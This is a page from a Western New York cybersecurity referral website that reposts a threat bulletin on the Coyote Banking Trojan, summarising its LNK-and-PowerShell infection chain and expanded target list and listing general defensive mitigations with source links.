icon

Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deak daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do charge or collect any fees.

Buffalo, New York
United States

Current Threat Data

Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

Summary:
Brazilian Windows users are the target of an evolving malware campaign deploying the Coyote Banking Trojan, a sophisticated banking malware designed to steal financial credentials and sensitive information. Once installed, Coyote is capable of keylogging, capturing screenshots, and displaying phishing overlays to trick victims into revealing their credentials. Fortinet FortiGuard Labs discovered this recent wave of attacks, identifying multiple Windows Shortcut (LNK) files embedded with PowerShell commands that act as the initial infection vector. These commands retrieve the malware from a remote server, initiating a multi-stage infection process designed to evade detection.

First documented by Kaspersky in early 2024, Coyote initially targeted South American users, specifically Brazilian financial institutions, compromising over 70 financial applications. The earlier version used a Squirrel installer to execute a Node.js application compiled with Electron, which in turn launched a Nim-based loader to deploy the final payload. However, the latest attack sequence has evolved, leveraging LNK files to execute PowerShell commands that download and launch a secondary PowerShell script from a remote server. This script activates a loader, which ultimately executes an interim payload to establish persistence and deploy the final Coyote Banking Trojan.

Security Officer Comments:
A notable enhancement in this recent variant is the expanded list of targeted entities, growing from financial applications to a broader scope of 1,030 sites and 73 financial institutions, including cryptocurrency exchanges and even hospitality-related websites. If an infected user attempts to visit one of these sites, the malware immediately contacts an attacker-controlled server, which determines the appropriate next step. Depending on the server’s response, the malware can capture screenshots, activate a keylogger, manipulate the display settings, or present phishing overlays to steal login credentials.

Suggested Corrections:
IOCs:

https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
  1. Restrict LNK and PowerShell Execution – Block LNK file execution from untrusted sources and limit PowerShell usage with Constrained Language Mode and script-block logging.
  2. Enhance Email & Web Security – Configure email security gateways to block LNK and script-based attachments, and use DNS filtering to prevent connections to known malicious domains.
  3. Endpoint & Network Monitoring – Deploy EDR solutions to detect registry modifications, unusual PowerShell execution, and outbound traffic to attacker-controlled servers.
  4. Enforce Least Privilege Access – Restrict admin privileges and prevent users from executing unauthorized scripts or modifying system settings.
  5. Regular System Updates & Patching – Keep Windows, security tools, and financial applications updated to mitigate exploits used by malware like Coyote
Link(s):
https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files

https://thehackernews.com/2025/02/coyote-malware-expands-reach-now.html

Contact Us for Threat Assistance
Back to Current Threats